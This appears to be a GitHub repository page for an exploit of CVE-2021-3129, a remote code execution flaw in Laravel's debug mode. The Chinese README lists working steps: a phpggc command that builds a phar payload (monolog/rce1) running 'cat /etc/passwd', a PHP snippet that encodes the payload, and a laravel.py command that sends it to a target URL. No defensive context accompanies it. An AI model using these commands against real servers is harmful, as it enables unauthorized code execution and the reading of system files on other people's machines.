Skip to content

0nion1/CVE-2021-3129

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2021-3129

生成自定义命令的phar包:
php -d'phar.readonly=0' ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w0

php -a 进入php命令行环境
$fp = fopen('php://output', 'w');
stream_filter_append($fp, 'convert.quoted-printable-encode');
$size = "";
fwrite($fp, iconv('utf-8','utf-16le',$size));

将生成好的payload保存为一个文件,然后利用脚本指定:
python laravel.py --url "http(s)://192.168.0.109:8000/" --phar test.phar

About

CVE-2021-3129-Laravel Debug mode

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages